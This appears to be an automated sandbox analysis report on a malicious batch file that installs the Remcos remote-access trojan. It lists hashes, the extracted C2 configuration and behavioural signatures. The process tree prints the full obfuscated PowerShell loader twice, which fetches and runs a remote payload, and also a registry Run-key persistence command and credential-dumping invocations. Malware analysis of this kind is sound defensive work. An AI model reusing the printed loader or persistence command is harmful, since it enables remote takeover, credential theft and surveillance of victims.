Overview

overview

10

Static

static

1

LTEXSP5634...ne.bat

windows7-x64

10

LTEXSP5634...ne.bat

windows10-2004-x64

10

Analysis

  • max time kernel
    147s
  • max time network
    146s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22/10/2024, 13:02

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    LTEXSP5634HISP9005STMSDSDOKUME74247liniereletbrunkagerne.bat

  • Size

    6KB

  • MD5

    79c452316f1b510462cf29f5fbbd84ba

  • SHA1

    2f95ab9367e8ef18427e2a8568afffbe0f197f22

  • SHA256

    4c697bdcbe64036ba8a79e587462960e856a37e3b8c94f9b3e7875aeb2f91959

  • SHA512

    9db2ed31b8fa24d38549707002fff53fc255630dca2b08c2c335816cabef1f57a4ab96fe01f41d65818a0cc58ecca770cb7c5697adbb65e3df53d7fe9f2c04e9

  • SSDEEP

    192:zQTm8sMkAEm+nTPTBylI9lCu8JHDyOrhZT:zQTxkllTPVmICu8YOtJ

Score
10/10
remcospowercollectiondiscoveryexecutionpersistencerat

Malware Config

Extracted

Family

remcos

Botnet

power

C2

pikolee.duckdns.org:51525

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-MC4T64

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

    ratremcos
  • Detected Nirsoft tools 3 IoCs

    Free utilities often used by attackers which can steal passwords, product keys, etc.

  • NirSoft MailPassView 1 IoCs

    Password recovery tool for various email clients

  • NirSoft WebBrowserPassView 1 IoCs

    Password recovery tool for various web browsers

  • Blocklisted process makes network request 6 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

    execution
  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
    collection
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Time Discovery 1 TTPs 1 IoCs

    Adversary may gather the system time and/or time zone settings from a local or remote system.

    discovery
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 30 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\LTEXSP5634HISP9005STMSDSDOKUME74247liniereletbrunkagerne.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4232
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -windowstyle hidden " <#Afstrmningsforholdene Mastigoneme Cuspidine informers Verdensbermthedernes Vandforsyningsresursers Vidneudsagnet #>;$Databger162='Usigelig';<#Receptorernes Preparietal Kavalerers Vernix Eskortere Betalbare #>;$Afgiftssatser=$Machine+$host.UI; function Fyrsternes($Sadlepladser){If ($Afgiftssatser) {$Horological++;}$Krydsfinerplade=$Angstneuroser+$Sadlepladser.'Length'-$Horological; for( $Swatting=4;$Swatting -lt $Krydsfinerplade;$Swatting+=5){$gratulerende=$Swatting;$Renees+=$Sadlepladser[$Swatting];$Fremtidsforskerens='Butenes';}$Renees;}function kaldedes($Teksthistories){ . ($Absolutismes) ($Teksthistories);}$Lively=Fyrsternes ',kelME,eroBaitzMagiiHi hlAcrol Sanadsri/Mose ';$Lively+=Fyrsternes 'Jasp5Feve.Unpa0Ga t Sab.(MoviWM sti,ovinN ordEs uoSk dwTebrs .li HjerNMe.aTbobb Smrb1Ou t0Marg.Skov0Ride;Pac S bvW osihowbnScyb6Test4 F i;Sata Po xHaug6Pl m4 lon;Knit F ndrB ttvStr :ga,p1Ti e3None1 put.S ap0 Led)Out SymbGSvroe Rosc knok Ar oAlab/Vars2 rem0 Da.1guld0I.do0tugt1Fljl0Domm1Jean HydF Regi Ch rHalielsehfGrouoEspaxBli /Tok 1 Urf3Hyra1 Tal.mind0Rapf ';$Hairstylists=Fyrsternes 'AlmuUKrivsFor eAm eRSimu-Kramadel gBor E Amin SubT loc ';$Hypernic=Fyrsternes 'Sy ehLimptVapot AnnpKarbsTand:Supe/Co p/PopupFrmnlSepti T.reBeculUnrit Sard Pro.FejltDataoEkspp Ple/Hov KVoyavGur aNormlGriliJudifistaiDetecWhipeSta rStudeOverdCorreTricsOuvr.Bankq CycxPiondIoej ';$Torsiogram=Fyrsternes 'Soci>Moto ';$Absolutismes=Fyrsternes 'U maifinaE LecxNavn ';$foredragsforeninger='Timetable';$Overwhelmingly='\Unslave.Mel';kaldedes (Fyrsternes 'Todk$ Torg SkrlNon o onbSalgADistluds :EpisFTriveUnivr Teki ,paa SprsObst5 S r= .ro$IsomeA abnCateV Pse:af saUrstPDuckpFedeDAntiAMultTKablA har+fari$GeodoMaimv SkyE HysrKnejwElsdhB ndE,occL oleMvkkeiTabsn PokG BorLInteY r,i ');kaldedes (Fyrsternes 'I in$K,ntg OphlP ojoPertBKar aAmatlStol:caviuacrodSlipgVarsI atifslskt Spas KoobR.eueBotthDaasO recvResmeKystTLincsBetr=Vas $OmstHA.urYRu.dPBridESpa.rCitaNBr eI.iliC .sn.ColoSDeviPSlicl UnmiLasttIn e(ager$Lgeet katOReinR PedSRangi Bi OLegeGHe orBiogaAr,em Gro)Boxb ');kaldedes (Fyrsternes 'Opdy[ UnsNLys eAdipTFoge.FalssN,naeSciaREtervGradi AfdCGeepE otopDis.o domIbarynSupeTH poMr craBoerNPiemaBe ngU.dteUpasrMani]Part:T.ul: DemS WalEPterCUdlnu sanRF skIFr sTNediYOmsaP O erDauwOKofiTOutnOFrydcPrveOForkLNost Vio,= utc Poll[Cavan,udeEP,natb ch.RecesTab eBr sCUndiuOmveRCentiK pit TreY .ntPSuper PraO BriT.karOEntrC rbvORestl IneTfolkYMusspHrmoE Hep]Redi:Conn:idmtTKlaslguarStec 1.umo2 Cra ');$Hypernic=$Udgiftsbehovets[0];$Decalcify18=(Fyrsternes '.hit$sak GBodslreemOdes bFremAUnprL abo:SideIStelmSaecM AnaOArborUnenTLejeaUnrelslowI KnaSbackEv luDRota=Bl,aNPostesoapWLbed-UnmaoTen.bB eojKildeUnscCT stTIc c Hy rsHomoYA.beS .agt onaEUn emB.nd.ForunTripeHandT nse.MalewCuerESchfb ImpcBegel po iUnace PinnZooft.kat ');kaldedes ($Decalcify18);kaldedes (Fyrsternes 'Frem$.verIA stm In.mPa moSpunrPreitTel aHopllMotoiRetosSenseStard emo.ForeHCo,ae OpgaCha dSelseAflarTomjsSu.b[ Bip$ PreH madaDecriF odrReevsIzbatWalky Fonl FoliIndesEne tJac.sKorr]Akan=Dest$Ju eLFo eiR fov de eUnp lnyt y .kr ');$Netvrkslsningens=Fyrsternes ' Nor$SadhI PinmKa,smUssioStr,rPhaltPrinaSymmlBialicratsFi.eeAdrodTole. Ro.Dnsk,o DecwprotnGuailSengoT,kka u,bd BolFM noiR velBir e Me (Egyp$ Af.HexpeyTorepUdgae U,sridion ecoiPe ncScen,Ne.r$,ranBDolkaMaplrAutetGri.hWouloPhenl,mbloo rnmUncoeFllea w snnaal)tam. ';$Bartholomean=$Ferias5;kaldedes (Fyrsternes 'Hier$ Ti gAll L tikOConvBTingaSkyplUnde: MisFTevaABomuNBehaFUnc aChokR WraoAce,n Bo AFlygd B.seR,mp1Gaml2 ,en8u io= Fun( Reot Fr,EAaresUn eT Re -SporPBrugaBun t Or,H.hum Fabr$SamfBPrseaPlisrVatit .mbHsupeo monL allOtredmSlaue Dela KarnKkke)Refi ');while (!$Fanfaronade128) {kaldedes (Fyrsternes 'Omga$ HungTsarl DenoRevebComiaReenlKrig:PalaOTenddSn oiUncosTurke TensDisktSy d=Mang$PendtFl trUnthu laneUdra ') ;kaldedes $Netvrkslsningens;kaldedes (Fyrsternes 'StegS Utnt claaQuadRQuadTOver-SabbSEverl Scaeres,EendeP Emm Vin4tige ');kaldedes (Fyrsternes 'Rygz$,rbegDo,elE poo Civb Sp a FinlBran:Hir.fnaivA Tu,n resFMethak adrCharOTudeNGisnAAcridDullEFire1 .kk2 Son8Apol= er(K.ngtBolveSproSKlipTC ck-.aanP LinAbraitGrusHaphy Tvan$f siB KonaH,tcRInteTExpuHLsenOTa.olVandoG.unM NagEDe cA PreNPerg)Cast ') ;kaldedes (Fyrsternes 'Stel$Su.egDebaL ChioD,ssBLionADiselRoya:Phy i TelNTeetDpunkeEft,NModtr ReaiS,ufGBriksGardF Reml SteY MalV ,inNNonciM llNDruiGTo aeRangRtabuN RedeV,de=Ha m$ En gInsplSenaOKanebEnj,ANonpl gro:EcottNaturOph.uNon ISmurnDyrpgA lv+I am+Pref%A,ch$.eskUAposD .roGBrneiP,ocfAdelTMesosDivibMet E UndhsystOReedv erEFortTAf.is Ups.D ggCTu eOBilbu MicN KryTT ta ') ;$Hypernic=$Udgiftsbehovets[$Indenrigsflyvningerne];}$Begravelsesaftale=340812;$Kuverts=30123;kaldedes (Fyrsternes 'Arbe$ SoeGS.bflStjiONonsB Su aUdstlGui : Bu.SIndvoCervLBilldGaloE dprHea i StaSQui TCholE HalNkachSanst J te=Acti ElogSpeceaarbtFort- E tCAfvaOAgniNPoohTCouneHumiNFlastWi,d Lovr$FlskbShipA O grBriltBelgHRenoOAc dlKultoHundM SkaeramiAVul nK.lo ');kaldedes (Fyrsternes 'Fred$w ndg Re,lVirgoBonbbUnbuaUnmulPr k:Or fSFagba ,admfranmPl ueRivenBa,ifRe.eaflakl Un.dfi neBattnFamieO kesAppe Afm= Tru Tilk[ GtsSG upyLysesChantCutleCircm P.d.Piz CKonooSnornLigkvCo se,iblrTeknt,eba]Meka: ydr: s lFKederDagko Senm O oBCr eaSubfs reveIn i6Revu4I feS FratCounrRavniFlaxnUnsmgLuxu(Bibe$LancSIncoo.virlOverdCause Decr Be iFlaksVltetTaabetilenMaltsChol)Fjer ');kaldedes (Fyrsternes 'St,r$GbakGCholLTotaoKu sbTazeADesaL han: W nOBahiVfodsEUnf R a.tfKl nlHyalOStemRMenti ,nodSe o Re,r= Slr Fode[ codSMi,rY TansVrelTSvr EByplm re.LnkltR,adE npxEvertHemo.E,eweF rmnSnuec BerO oredNonvITerrn BroG Fri]C,nd:ange:GgeuADuplsVidecIndsI UnsII di. desgSub eBe zTBollSSrgeti.lur ndeiModgnBlacGDeta( Mon$ph.nSAp,paRepomRe em RapEAntinKommFR ylaNortlUneldMeadeHar,nIndee .usS Va )Term ');kaldedes (Fyrsternes 'Ja.t$Stamg Te lPearo,uidbNo.eAMod LDomm:Gr,rAFo tLbesslSlvsEDe,elHaziUR.glJ Nada Dia7C,st8 For=Weig$AlkiO OveV R ve MaiR O,tfViddLApotOInterBi bIKangdIde .Erh sRensU ennbFej srefotFirkRBliaI.anonNoncgBugt( Ant$OutdBStatEAareGTilbR Misa An.VSkile roLAnalS.vrdeC,sssUndeaRnkefBe.oTAegfa.hamLLubbeVide,triv$BlaakIlliUSta,V ksePrenr Selt,krms Pri)Blue ');kaldedes $Alleluja78;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:756
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Afstrmningsforholdene Mastigoneme Cuspidine informers Verdensbermthedernes Vandforsyningsresursers Vidneudsagnet #>;$Databger162='Usigelig';<#Receptorernes Preparietal Kavalerers Vernix Eskortere Betalbare #>;$Afgiftssatser=$Machine+$host.UI; function Fyrsternes($Sadlepladser){If ($Afgiftssatser) {$Horological++;}$Krydsfinerplade=$Angstneuroser+$Sadlepladser.'Length'-$Horological; for( $Swatting=4;$Swatting -lt $Krydsfinerplade;$Swatting+=5){$gratulerende=$Swatting;$Renees+=$Sadlepladser[$Swatting];$Fremtidsforskerens='Butenes';}$Renees;}function kaldedes($Teksthistories){ . ($Absolutismes) ($Teksthistories);}$Lively=Fyrsternes ',kelME,eroBaitzMagiiHi hlAcrol Sanadsri/Mose ';$Lively+=Fyrsternes 'Jasp5Feve.Unpa0Ga t Sab.(MoviWM sti,ovinN ordEs uoSk dwTebrs .li HjerNMe.aTbobb Smrb1Ou t0Marg.Skov0Ride;Pac S bvW osihowbnScyb6Test4 F i;Sata Po xHaug6Pl m4 lon;Knit F ndrB ttvStr :ga,p1Ti e3None1 put.S ap0 Led)Out SymbGSvroe Rosc knok Ar oAlab/Vars2 rem0 Da.1guld0I.do0tugt1Fljl0Domm1Jean HydF Regi Ch rHalielsehfGrouoEspaxBli /Tok 1 Urf3Hyra1 Tal.mind0Rapf ';$Hairstylists=Fyrsternes 'AlmuUKrivsFor eAm eRSimu-Kramadel gBor E Amin SubT loc ';$Hypernic=Fyrsternes 'Sy ehLimptVapot AnnpKarbsTand:Supe/Co p/PopupFrmnlSepti T.reBeculUnrit Sard Pro.FejltDataoEkspp Ple/Hov KVoyavGur aNormlGriliJudifistaiDetecWhipeSta rStudeOverdCorreTricsOuvr.Bankq CycxPiondIoej ';$Torsiogram=Fyrsternes 'Soci>Moto ';$Absolutismes=Fyrsternes 'U maifinaE LecxNavn ';$foredragsforeninger='Timetable';$Overwhelmingly='\Unslave.Mel';kaldedes (Fyrsternes 'Todk$ Torg SkrlNon o onbSalgADistluds :EpisFTriveUnivr Teki ,paa SprsObst5 S r= .ro$IsomeA abnCateV Pse:af saUrstPDuckpFedeDAntiAMultTKablA har+fari$GeodoMaimv SkyE HysrKnejwElsdhB ndE,occL oleMvkkeiTabsn PokG BorLInteY r,i ');kaldedes (Fyrsternes 'I in$K,ntg OphlP ojoPertBKar aAmatlStol:caviuacrodSlipgVarsI atifslskt Spas KoobR.eueBotthDaasO recvResmeKystTLincsBetr=Vas $OmstHA.urYRu.dPBridESpa.rCitaNBr eI.iliC .sn.ColoSDeviPSlicl UnmiLasttIn e(ager$Lgeet katOReinR PedSRangi Bi OLegeGHe orBiogaAr,em Gro)Boxb ');kaldedes (Fyrsternes 'Opdy[ UnsNLys eAdipTFoge.FalssN,naeSciaREtervGradi AfdCGeepE otopDis.o domIbarynSupeTH poMr craBoerNPiemaBe ngU.dteUpasrMani]Part:T.ul: DemS WalEPterCUdlnu sanRF skIFr sTNediYOmsaP O erDauwOKofiTOutnOFrydcPrveOForkLNost Vio,= utc Poll[Cavan,udeEP,natb ch.RecesTab eBr sCUndiuOmveRCentiK pit TreY .ntPSuper PraO BriT.karOEntrC rbvORestl IneTfolkYMusspHrmoE Hep]Redi:Conn:idmtTKlaslguarStec 1.umo2 Cra ');$Hypernic=$Udgiftsbehovets[0];$Decalcify18=(Fyrsternes '.hit$sak GBodslreemOdes bFremAUnprL abo:SideIStelmSaecM AnaOArborUnenTLejeaUnrelslowI KnaSbackEv luDRota=Bl,aNPostesoapWLbed-UnmaoTen.bB eojKildeUnscCT stTIc c Hy rsHomoYA.beS .agt onaEUn emB.nd.ForunTripeHandT nse.MalewCuerESchfb ImpcBegel po iUnace PinnZooft.kat ');kaldedes ($Decalcify18);kaldedes (Fyrsternes 'Frem$.verIA stm In.mPa moSpunrPreitTel aHopllMotoiRetosSenseStard emo.ForeHCo,ae OpgaCha dSelseAflarTomjsSu.b[ Bip$ PreH madaDecriF odrReevsIzbatWalky Fonl FoliIndesEne tJac.sKorr]Akan=Dest$Ju eLFo eiR fov de eUnp lnyt y .kr ');$Netvrkslsningens=Fyrsternes ' Nor$SadhI PinmKa,smUssioStr,rPhaltPrinaSymmlBialicratsFi.eeAdrodTole. Ro.Dnsk,o DecwprotnGuailSengoT,kka u,bd BolFM noiR velBir e Me (Egyp$ Af.HexpeyTorepUdgae U,sridion ecoiPe ncScen,Ne.r$,ranBDolkaMaplrAutetGri.hWouloPhenl,mbloo rnmUncoeFllea w snnaal)tam. ';$Bartholomean=$Ferias5;kaldedes (Fyrsternes 'Hier$ Ti gAll L tikOConvBTingaSkyplUnde: MisFTevaABomuNBehaFUnc aChokR WraoAce,n Bo AFlygd B.seR,mp1Gaml2 ,en8u io= Fun( Reot Fr,EAaresUn eT Re -SporPBrugaBun t Or,H.hum Fabr$SamfBPrseaPlisrVatit .mbHsupeo monL allOtredmSlaue Dela KarnKkke)Refi ');while (!$Fanfaronade128) {kaldedes (Fyrsternes 'Omga$ HungTsarl DenoRevebComiaReenlKrig:PalaOTenddSn oiUncosTurke TensDisktSy d=Mang$PendtFl trUnthu laneUdra ') ;kaldedes $Netvrkslsningens;kaldedes (Fyrsternes 'StegS Utnt claaQuadRQuadTOver-SabbSEverl Scaeres,EendeP Emm Vin4tige ');kaldedes (Fyrsternes 'Rygz$,rbegDo,elE poo Civb Sp a FinlBran:Hir.fnaivA Tu,n resFMethak adrCharOTudeNGisnAAcridDullEFire1 .kk2 Son8Apol= er(K.ngtBolveSproSKlipTC ck-.aanP LinAbraitGrusHaphy Tvan$f siB KonaH,tcRInteTExpuHLsenOTa.olVandoG.unM NagEDe cA PreNPerg)Cast ') ;kaldedes (Fyrsternes 'Stel$Su.egDebaL ChioD,ssBLionADiselRoya:Phy i TelNTeetDpunkeEft,NModtr ReaiS,ufGBriksGardF Reml SteY MalV ,inNNonciM llNDruiGTo aeRangRtabuN RedeV,de=Ha m$ En gInsplSenaOKanebEnj,ANonpl gro:EcottNaturOph.uNon ISmurnDyrpgA lv+I am+Pref%A,ch$.eskUAposD .roGBrneiP,ocfAdelTMesosDivibMet E UndhsystOReedv erEFortTAf.is Ups.D ggCTu eOBilbu MicN KryTT ta ') ;$Hypernic=$Udgiftsbehovets[$Indenrigsflyvningerne];}$Begravelsesaftale=340812;$Kuverts=30123;kaldedes (Fyrsternes 'Arbe$ SoeGS.bflStjiONonsB Su aUdstlGui : Bu.SIndvoCervLBilldGaloE dprHea i StaSQui TCholE HalNkachSanst J te=Acti ElogSpeceaarbtFort- E tCAfvaOAgniNPoohTCouneHumiNFlastWi,d Lovr$FlskbShipA O grBriltBelgHRenoOAc dlKultoHundM SkaeramiAVul nK.lo ');kaldedes (Fyrsternes 'Fred$w ndg Re,lVirgoBonbbUnbuaUnmulPr k:Or fSFagba ,admfranmPl ueRivenBa,ifRe.eaflakl Un.dfi neBattnFamieO kesAppe Afm= Tru Tilk[ GtsSG upyLysesChantCutleCircm P.d.Piz CKonooSnornLigkvCo se,iblrTeknt,eba]Meka: ydr: s lFKederDagko Senm O oBCr eaSubfs reveIn i6Revu4I feS FratCounrRavniFlaxnUnsmgLuxu(Bibe$LancSIncoo.virlOverdCause Decr Be iFlaksVltetTaabetilenMaltsChol)Fjer ');kaldedes (Fyrsternes 'St,r$GbakGCholLTotaoKu sbTazeADesaL han: W nOBahiVfodsEUnf R a.tfKl nlHyalOStemRMenti ,nodSe o Re,r= Slr Fode[ codSMi,rY TansVrelTSvr EByplm re.LnkltR,adE npxEvertHemo.E,eweF rmnSnuec BerO oredNonvITerrn BroG Fri]C,nd:ange:GgeuADuplsVidecIndsI UnsII di. desgSub eBe zTBollSSrgeti.lur ndeiModgnBlacGDeta( Mon$ph.nSAp,paRepomRe em RapEAntinKommFR ylaNortlUneldMeadeHar,nIndee .usS Va )Term ');kaldedes (Fyrsternes 'Ja.t$Stamg Te lPearo,uidbNo.eAMod LDomm:Gr,rAFo tLbesslSlvsEDe,elHaziUR.glJ Nada Dia7C,st8 For=Weig$AlkiO OveV R ve MaiR O,tfViddLApotOInterBi bIKangdIde .Erh sRensU ennbFej srefotFirkRBliaI.anonNoncgBugt( Ant$OutdBStatEAareGTilbR Misa An.VSkile roLAnalS.vrdeC,sssUndeaRnkefBe.oTAegfa.hamLLubbeVide,triv$BlaakIlliUSta,V ksePrenr Selt,krms Pri)Blue ');kaldedes $Alleluja78;"
    1⤵
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • System Time Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3536
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of WriteProcessMemory
      PID:1556
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Forsnakket154" /t REG_EXPAND_SZ /d "%Dyrespor% -windowstyle 1 $Okkupationstropperne=(gp -Path 'HKCU:\Software\Driftsikkerheds\').Dokkedal;%Dyrespor% ($Okkupationstropperne)"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4128
        • C:\Windows\SysWOW64\reg.exe
          REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Forsnakket154" /t REG_EXPAND_SZ /d "%Dyrespor% -windowstyle 1 $Okkupationstropperne=(gp -Path 'HKCU:\Software\Driftsikkerheds\').Dokkedal;%Dyrespor% ($Okkupationstropperne)"
          4⤵
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          • Modifies registry key
          PID:3124
      • C:\Windows\SysWOW64\msiexec.exe
        C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\ewng"
        3⤵
          PID:1568
        • C:\Windows\SysWOW64\msiexec.exe
          C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\ewng"
          3⤵
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:620
        • C:\Windows\SysWOW64\msiexec.exe
          C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\oqszfas"
          3⤵
            PID:4568
          • C:\Windows\SysWOW64\msiexec.exe
            C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\oqszfas"
            3⤵
            • Accesses Microsoft Outlook accounts
            • System Location Discovery: System Language Discovery
            PID:1768
          • C:\Windows\SysWOW64\msiexec.exe
            C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\rsxsgkdbono"
            3⤵
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4500

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        1KB

        MD5

        d4ff23c124ae23955d34ae2a7306099a

        SHA1

        b814e3331a09a27acfcd114d0c8fcb07957940a3

        SHA256

        1de6cfd5e02c052e3475d33793b6a150b2dd6eebbf0aa3e4c8e4e2394a240a87

        SHA512

        f447a6042714ae99571014af14bca9d87ede59af68a0fa1d880019e9f1aa41af8cbf9c08b0fea2ccb7caa48165a75825187996ea6939ee8370afa33c9f809e79

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vyc0tari.elv.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\ewng
        Filesize

        4KB

        MD5

        75379d3dcbcea6a69bc75b884816dd40

        SHA1

        7e073a03c3bdbbc60375ddbe56bba211c3d412a6

        SHA256

        cab559f3bbe4a0beb194dffca723b3072184b92687100462eaab04d66fff8de9

        SHA512

        710c2cee369a57a0039fc0d0c59de6118780210ef60ad0daf374f03ba94ab08039bc2aff821f7c99a0ecd0e16189c52e5b6d630b3d541f7b11375f134b985e8c

        Download Submit

      • C:\Users\Admin\AppData\Roaming\Unslave.Mel
        Filesize

        482KB

        MD5

        39858943e5706782a2e5b0c5791511de

        SHA1

        ac3ba663425edcc14c79b58d933f6dd6ad46dec4

        SHA256

        1e187e2094f3aeca9a210e974cddaf48521ced815f2127cad6df88fe1cb26f96

        SHA512

        9c4bf3856aa9deb997e390812711ef7091772dcd46594bd0f1fcfbddd75fb68a6fff2e8280335c3ea749f2cc0849a5274471e1daa7e50b2587b8eea41390184e

        Download Submit

      • memory/620-69-0x0000000000400000-0x0000000000478000-memory.dmp

        Filesize

        480KB

        Download

      • memory/620-77-0x0000000000400000-0x0000000000478000-memory.dmp

        Filesize

        480KB

        Download

      • memory/620-73-0x0000000000400000-0x0000000000478000-memory.dmp

        Filesize

        480KB

        Download

      • memory/620-71-0x0000000000400000-0x0000000000478000-memory.dmp

        Filesize

        480KB

        Download

      • memory/756-17-0x00007FFE57050000-0x00007FFE57B11000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/756-2-0x00007FFE57053000-0x00007FFE57055000-memory.dmp

        Filesize

        8KB

        Download

      • memory/756-20-0x00007FFE57050000-0x00007FFE57B11000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/756-14-0x00007FFE57050000-0x00007FFE57B11000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/756-13-0x00007FFE57050000-0x00007FFE57B11000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/756-3-0x00000209AA480000-0x00000209AA4A2000-memory.dmp

        Filesize

        136KB

        Download

      • memory/1556-85-0x0000000020700000-0x0000000020719000-memory.dmp

        Filesize

        100KB

        Download

      • memory/1556-89-0x0000000020700000-0x0000000020719000-memory.dmp

        Filesize

        100KB

        Download

      • memory/1556-88-0x0000000020700000-0x0000000020719000-memory.dmp

        Filesize

        100KB

        Download

      • memory/1556-64-0x0000000000E40000-0x0000000002094000-memory.dmp

        Filesize

        18.3MB

        Download

      • memory/1768-70-0x0000000000400000-0x0000000000462000-memory.dmp

        Filesize

        392KB

        Download

      • memory/1768-75-0x0000000000400000-0x0000000000462000-memory.dmp

        Filesize

        392KB

        Download

      • memory/1768-79-0x0000000000400000-0x0000000000462000-memory.dmp

        Filesize

        392KB

        Download

      • memory/3536-26-0x0000000005600000-0x0000000005622000-memory.dmp

        Filesize

        136KB

        Download

      • memory/3536-43-0x0000000006A30000-0x0000000006A4A000-memory.dmp

        Filesize

        104KB

        Download

      • memory/3536-46-0x0000000008930000-0x0000000008ED4000-memory.dmp

        Filesize

        5.6MB

        Download

      • memory/3536-44-0x0000000007720000-0x00000000077B6000-memory.dmp

        Filesize

        600KB

        Download

      • memory/3536-48-0x0000000074A30000-0x00000000751E0000-memory.dmp

        Filesize

        7.7MB

        Download

      • memory/3536-49-0x0000000074A30000-0x00000000751E0000-memory.dmp

        Filesize

        7.7MB

        Download

      • memory/3536-50-0x0000000074A30000-0x00000000751E0000-memory.dmp

        Filesize

        7.7MB

        Download

      • memory/3536-51-0x0000000074A30000-0x00000000751E0000-memory.dmp

        Filesize

        7.7MB

        Download

      • memory/3536-52-0x0000000074A30000-0x00000000751E0000-memory.dmp

        Filesize

        7.7MB

        Download

      • memory/3536-54-0x0000000074A3E000-0x0000000074A3F000-memory.dmp

        Filesize

        4KB

        Download

      • memory/3536-53-0x0000000008EE0000-0x000000000B0D9000-memory.dmp

        Filesize

        34.0MB

        Download

      • memory/3536-55-0x0000000074A30000-0x00000000751E0000-memory.dmp

        Filesize

        7.7MB

        Download

      • memory/3536-56-0x0000000074A30000-0x00000000751E0000-memory.dmp

        Filesize

        7.7MB

        Download

      • memory/3536-45-0x00000000076B0000-0x00000000076D2000-memory.dmp

        Filesize

        136KB

        Download

      • memory/3536-42-0x0000000007D00000-0x000000000837A000-memory.dmp

        Filesize

        6.5MB

        Download

      • memory/3536-21-0x0000000074A3E000-0x0000000074A3F000-memory.dmp

        Filesize

        4KB

        Download

      • memory/3536-41-0x0000000006540000-0x000000000658C000-memory.dmp

        Filesize

        304KB

        Download

      • memory/3536-22-0x0000000002B80000-0x0000000002BB6000-memory.dmp

        Filesize

        216KB

        Download

      • memory/3536-40-0x00000000064B0000-0x00000000064CE000-memory.dmp

        Filesize

        120KB

        Download

      • memory/3536-23-0x0000000074A30000-0x00000000751E0000-memory.dmp

        Filesize

        7.7MB

        Download

      • memory/3536-38-0x0000000005E60000-0x00000000061B4000-memory.dmp

        Filesize

        3.3MB

        Download

      • memory/3536-28-0x0000000005D60000-0x0000000005DC6000-memory.dmp

        Filesize

        408KB

        Download

